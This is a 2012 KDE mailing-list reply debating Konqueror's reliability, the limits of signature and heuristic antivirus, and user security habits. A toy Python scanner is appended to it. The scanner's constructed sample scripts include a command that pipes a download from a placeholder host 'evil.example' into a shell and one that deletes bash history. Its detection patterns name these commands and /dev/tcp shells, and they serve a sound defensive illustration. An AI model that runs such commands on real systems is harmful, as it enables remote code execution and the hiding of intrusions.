Automated import of camera photos

Duncan 1i5t5.duncan at cox.net
Mon Dec 10 21:42:08 GMT 2012


Anne Wilson posted on Mon, 10 Dec 2012 15:15:03 +0000 as excerpted:

> As an example of FUD, this message takes some beating.  Just to deal
> with a few points -

FWIW, I'd definitely agree it's a bit over-the-top-one-sided, but OTOH, 
that's what it can TAKE sometimes, to get people who "just want it to 
work" and don't really /care/ about security, to get the message, and 
START caring, at least enough to stay on something with a bit less chance 
of being a danger to both themselves and others on the net with them.

> KDE is, for the most part, entirely stable - just stay away from
> KDE-PIM.

Definitely agree on kdepim, but I'd throw in pretty much the entire 
semantic-desktop in there as well.  Tho YMMV, as they say.  But dE has a 
point.  One big personal example here, the one that finally triggered my 
switch from konqueror to firefox as my default browser, was the so-called 
stable series 4.6.2 konqueror infamous form double-submission bug.  KDE 
has supposedly been ready for ordinary users since 4.2 (tho I'm on record 
as saying late 4.5, the 4.2 claim was pure unadulterated bunk, kde4 was 
still ALPHA back then, as clearly indicated by the bugs where devs were 
saying kde3-stable features weren't yet available in kde4, it wasn't even 
feature-complete yet, the /classic/ definition of alpha!), yet here we 
had the primary browser being broken for TWO so-called stable-series 
"safe to upgrade to" releases.

People in the REAL world use their browser for such things as online 
purchases, banking, etc, where form double-submission could result in 
being billed TWICE for a purchase or online transaction!

Yes, bugs DO happen, even in "stable series".  But with a properly 
supported browser, the fix would have been out in DAYS once the problem 
was public, not MONTHS.  Especially so given that the bad commit was said 
to be quite obviously a commit to stable that only should have gone to 
master, and was easy to pin down and revert.  Yet not only was a 4.6.2.1 
(or whatever) bump never forthcoming, the fix didn't even make 4.6.3.  It 
was 4.6.4 before a fix finally appeared.

Clearly, if kde4 itself is claimed to be stable, then either the kde and 
specifically konqueror (or kdelibs, IDR/K which) devs are playing 
ENTIRELY irresponsible games with a browser they *KNOW* is being used for 
online banking, etc, OR, they consider konqueror little more than a piece 
of demoware, unfit to be used "in the real world" for online banking, 
etc, in any case.

In a perfect world they'd actually make a public statement one way or the 
other, but I've not seen any such thing here.  However, other evidence 
(such as the entire lack of GUI security cert management for several 
feature releases AFTER kde4 was declared stable, and the fact that many 
kde devs are known from blog comments, etc, to run firefox or chrome/
chromium as their primary browser) suggests that they simply don't 
consider konqueror anything more than a toy.  Once I realized that, I 
switched within days, as I *DO* use my browser for "real life" tasks like 
online banking, etc.

But the lack of that definitive public statement about konqueror just 
being a "toy" browser, on a platform kde continues to claim is stable, 
fits the developed pattern all too well.  I'm personally actually fine 
with running pre-release software and in fact am running kde-4.10-beta2 
(aka 4.9.90) right now.  But it'd be nice to have it called such, when 
such it is.  Meanwhile, to the extent that I actually rely on things to 
work, the trend here has been clear for some time.  I'm gradually 
switching off of kde for anything I actually depend on to work.  Firefox 
instead of konqueror, anything kdepim at all, the entire semantic-desktop 
is, to the extent possible, opted-out of at build configure time, etc.  
Now, I'm still using the core kde desktop, plasma, kwin, etc, plus games, 
but if games break I can still get into my bank to pay the bills, kwin 
has been remarkably stable for me since I upgraded graphics to support 
it, and plasma and krunner (as well as kwin) as components can be 
restarted if necessary, and have actually been quite stable of late 
(since I quit building kde with semantic-desktop and kdepim support at 
least) as well.

> Your recommendation to mislead her on the spam subject is objectionable.
> 
> Antivirus software definitely does work - as long as it is set up to
> receive signature updates regularly.  The reason there are so many
> infected computers is that many people don't use an AV product at all,
> others install one, preferably a free-as-in-beer one, and don't properly
> set up updates.  I know one user who has used Windows daily for 20+
> years and never had a single infection.  Education on key risks is the
> key.

For a decade, until MS pushed me off with eXPrivacy, I was one of those 
people.  However, there's a big word there, EDUCATION.  But behind it 
there's an even bigger concept, ACTUALLY CARING.  Of course, malware 
spreading users aren't the ONLY ones who don't seem to actually CARE, see 
the above about konqueror devs leaving their users with known financial-
transaction-sensitive bugs for months, with no security-bump-update, plus 
the claim that kde (including konqueror) is ordinary user ready, when 
it's lacking security-cert management for YEARS after that claim was 
made, in an age where entire certificate authorities along with 
everything they issued get revoked!

So I guess users get a bit of slack if even the devs can't be bothered to 
CARE about security enough to either code-up or make a public statement 
disavowing the platform's primary browser as fit for anything other than 
a toy.

But, one point is often lost in the AV context.   Signature-based AV 
(where the updates primarily update the sigs) is primarily if not 
exclusively retroactive reaction-based.  AV vendors have to have malware 
reported and take it apart in the lab in order to develop those 
signatures.  That takes time, and while proper updates can keep detected 
malware from spreading TOO widely, the system is predicated on there 
being SOME victims first, to trigger the initial reports.

And heuristic-based action analysis and prevention anti-malware is 
fraught with false-positives, to the point that it can never be anything 
close to even 90% effective, because either it's turned up to the point 
that it warns about EVERYTHING, and people either turn it off or start 
ignoring it and automatically clicking right through the warnings (a problem 
MS has clearly had with its own efforts), or it misses enough potentially 
hazardous actions that it's quite possible to work around.

There simply is NO alternative to the REAL solution, getting people to 
ACTUALLY CARE enough so EDUCATION (the word you used) can work.

But human nature, which is what we're up against, is a hard nut to 
crack.  Some people just /don't/ care.  Others, like me with my decade on 
MS before switching, uninfected, and that guy you mentioned with 20 years 
on MS, clearly DO care, and spend significant time and energy on keeping 
up with developments enough to defend themselves.  But we're clearly a 
minority, and prove nothing about the "just don't care" susceptibility of 
an ordinary user on MS.

dE's method of /scaring/ them into caring, at least enough to keep them 
from running MS most of the time, is arguably what it takes in some 
cases, as arguably surface-deceptive as it may be.  I have serious doubts 
as to whether it's particularly effective long-term, but with older 
people who honestly in all likelihood don't /have/ "long term" to worry 
about, or for those (older or not) who are sufficiently uncomfortable 
with the whole computer thing to limit their monthly exposure to 
the point where the scare tactic may last long /enough/, it /may/ work.

That's not saying I'd use the tactic myself, but I understand it.  
Meanwhile, if over-stating the issue GETS them to care, even (somewhat) 
short term, perhaps it's simply like deliberately shouting and otherwise 
pretending to be angry simply to get a point across, sometimes it's what 
it takes.  And if the target and others they'd affect are safer for it, 
even relatively short-term, who's to say it's wrong?

But like you, Anne, I'm still uncomfortable enough with the tactic that 
I'm unlikely to use it myself.

> And no, Linux isn't safe from malware.  Safer than Windows, yes, if you
> leave holes in Windows, but an unprotected computer, whichever OS it is
> using, is likely to be compromised sooner or later.

Ultimately, it all comes down to the end user, and how much they actually 
CARE about it.  There's simply no getting around that fact.

In some ways, it's like drunk driving.  At least here in the US, MADD/
SADD and other efforts finally seem to have had some effect, according 
to recent studies.  Even among the drinking/partying set, there's now 
relatively strong PEER pressure, in addition to LEGAL pressure, to have a 
designated driver who does NOT drink, and at parties, a keymaster, whose 
responsibility it is to take driver's keys and keep them safe during the 
party, and give them back only to a taxi driver if he judges the key 
owner unfit to drive.

(Well OT, but the recent state pot legalization, with Washington's 
law specifically set up to handle driving while intoxicated with pot 
similar to the way they deal with drunk driving, likely kicks off an era 
when we see the laws evolve to handle other drugs similar to the way 
alcohol is handled, driving-wise.  Of course some states already do that 
to some extent, and that in fact has been one of the arguments behind 
drug legalization as well, there's better control over drunk driving, 
BECAUSE alcohol is legal and the laws have been allowed to evolve to deal 
with it, than illegal drugs, where such developments really haven't had a 
chance to properly evolve due to the illegality of the drugs in the first 
place.)

Ultimately, just as with drunk driving, as long as people simply get a 
slap on the wrist and simply told to be good boys/girls now and not do it 
again, a lot of people SIMPLY WILL NOT CARE.  It's only when the 
consequences become drastic enough, both from a legal and peer 
perspective, that these people care, and society's actions as a whole 
begin to change.

Arguably, overstating the risks of NOT CARING is a way of motivating the 
desired changes.  As with alcohol and drugs, the chances of it working 
long term over the general population are nil.  Behavior as a system 
won't change until the acceptance of that system to said behavior 
changes.  But if there's someone you care about, scaring them into 
compliance /might/ work... long enough.  OTOH, there's significant risk 
of it backfiring, too, if they ever figure out that you simply scared 
them into compliance, and thus discount the truth of even the valid 
statements, due to the demonstrated overstatements.  Oh, well...

But what worries me is people who get the wrong idea that Linux IS 
invulnerable, and thus see it as a panacea for actual CARING about 
security, believing that if they run Linux, they don't HAVE to care.  
THAT is what SCARES me!

Because as you said, given someone who doesn't care (or a sufficiently 
high target profile from the attacker's perspective), no (real-world 
general-purpose) OS is invulnerable.  All will fall, sooner or later.  
The only way to avoid that is to CARE enough to take the time to educate 
yourself and to act on what you learn.  And ultimately, part of what you 
learn is simply how to keep your attack profile and ease of successful 
attack low enough that there's always someone else that's easier to 
attack, for the given reward it'd bring.  People who are juicier targets 
thus have to have correspondingly stronger defenses, while the ordinary 
user simply has to ensure that the doors are locked and the valuables out 
of sight, as they say.  And arguably, it /is/ true that locking those 
doors and keeping those valuables out of sight is easier on Linux, but 
that doesn't make it impossible to lock them and keep the valuables out 
of sight on MS.  It just lowers an individual's attack profile a bit, 
good as part of a larger solution which by definition must include CARING 
about the problem in the first place, but not sufficient in and of itself.

-- 
Duncan - List replies preferred.   No HTML msgs.
"Every nonfree program has a lord, a master --
and if you use the program, he is your master."  Richard Stallman
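The two anti-malware points made in the message above (that signature-based AV can only catch what a lab has already seen, and that heuristic detection trades false positives against misses) can be shown concretely with a toy scanner.  This is an added example, not code from the original post or from any AV product or KDE component.  The "samples" are constructed shell-script byte strings, not real malware, and the hash signatures, byte-pattern signature and heuristic indicator list are all assumptions made up for the demo.

```python
"""Toy scanner: exact-hash signatures vs byte-pattern signatures vs heuristics.

Added example, not from the mailing-list post.  All samples are constructed
shell scripts; the "evil.example" hosts are placeholders, not real malware.
"""
import hashlib
import re

# Constructed sample "files".  dropper_v2 differs from dropper_v1 by one byte
# (the URL path); dropper_v3 also drops the history-wipe line; backup.sh is a
# benign admin script that happens to use the same pipe-to-shell idiom.
SAMPLES = {
    "dropper_v1": b"#!/bin/sh\ncurl -s http://evil.example/p | sh\nrm -f ~/.bash_history\n",
    "dropper_v2": b"#!/bin/sh\ncurl -s http://evil.example/q | sh\nrm -f ~/.bash_history\n",
    "dropper_v3": b"#!/bin/sh\ncurl -s http://evil.example/r | sh\n",
    "backup.sh":  b"#!/bin/sh\ncurl -s http://backup.example/cfg | sh\nrm -f /tmp/backup.lock\n",
}

# Assumed byte-pattern ("YARA-style") signature an analyst might write after
# looking at dropper_v1: it covers the whole family, not one exact file.
FAMILY_PATTERNS = {"evil_dropper": b"curl -s http://evil.example/"}

# Assumed heuristic indicators; each regex is one "suspicious action".
INDICATORS = {
    "pipe_to_shell": re.compile(rb"curl[^\n]*\|\s*sh"),
    "history_wipe":  re.compile(rb"rm -f [^\n]*\.bash_history"),
    "net_shell":     re.compile(rb"/dev/tcp/"),
}


def hash_signature(sample: bytes) -> str:
    """What the vendor lab produces once a victim has reported a sample."""
    return hashlib.sha256(sample).hexdigest()


def hash_detect(data: bytes, sigs: set) -> bool:
    """Exact-match scan: only files whose hash is already in the sig set hit."""
    return hashlib.sha256(data).hexdigest() in sigs


def pattern_detect(data: bytes, patterns: dict) -> list:
    """Byte-pattern scan: survives small edits (one changed byte) to the family."""
    return [name for name, pat in patterns.items() if pat in data]


def heuristic_score(data: bytes) -> int:
    """Count suspicious actions; no prior knowledge of the sample needed."""
    return sum(1 for pat in INDICATORS.values() if pat.search(data))


def heuristic_verdicts(samples: dict, threshold: int) -> dict:
    """Flag at or above threshold.  Lower threshold: more catches, more FPs."""
    return {name: heuristic_score(d) >= threshold for name, d in samples.items()}


def signature_timeline(samples: dict) -> dict:
    """Hash-sig lifecycle: nothing is caught until someone reports dropper_v1."""
    sigs = set()
    before = {n: hash_detect(d, sigs) for n, d in samples.items()}
    sigs.add(hash_signature(samples["dropper_v1"]))  # lab ships the update
    after = {n: hash_detect(d, sigs) for n, d in samples.items()}
    return {"before_report": before, "after_update": after}


if __name__ == "__main__":
    print("hash signatures:", signature_timeline(SAMPLES))
    print("pattern signature:",
          {n: pattern_detect(d, FAMILY_PATTERNS) for n, d in SAMPLES.items()})
    for t in (1, 2):
        print(f"heuristic threshold {t}:", heuristic_verdicts(SAMPLES, t))
```

Running it shows the three regimes: before the first report the hash set is empty and every sample passes; after the lab adds dropper_v1's hash, v1 is caught but the one-byte variant v2 still passes, so the family needs a pattern signature (which then catches v1, v2 and v3 while leaving backup.sh alone).  The heuristic needs no sample at all, but at threshold 1 it flags the benign backup.sh (a false positive, the kind users learn to click through), and at threshold 2 it clears backup.sh at the price of missing dropper_v3, which simply omitted one suspicious action.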

___________________________________________________
This message is from the kde mailing list.
Account management:  https://mail.kde.org/mailman/listinfo/kde.
Archives: http://lists.kde.org/.
More info: http://www.kde.org/faq.html.